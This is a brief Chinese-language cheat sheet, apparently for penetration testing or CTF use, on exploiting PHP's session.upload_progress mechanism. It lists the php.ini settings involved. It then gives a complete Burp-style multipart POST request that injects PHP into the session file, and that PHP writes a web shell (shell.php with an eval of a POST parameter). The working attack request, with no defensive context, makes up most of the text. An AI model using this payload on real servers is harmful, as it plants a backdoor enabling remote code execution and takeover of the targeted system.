php配置文件修改
session.upload_progress.enabled可以控制是否开启session.upload_progress功能
session.upload_progress.cleanup可以控制是否在上传之后删除文件内容
session.upload_progress.prefix可以设置上传文件内容的前缀
session.upload_progress.name的值即为session中的键值
burp数据包构造sess文件上传
构造数据包需要注意:--是结束标志等
POST /session/session.php HTTP/1.1
Host: 10.18.46.124
Cookie: PHPSESSID=nihao
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5eDfG4OUY8WoPzki
Content-Length: 284
------WebKitFormBoundary5eDfG4OUY8WoPzki
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?php phpinfo();fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
------WebKitFormBoundary5eDfG4OUY8WoPzki
Content-Disposition: form-data; name="file"; filename="a.jpg"
a
------WebKitFormBoundary5eDfG4OUY8WoPzki--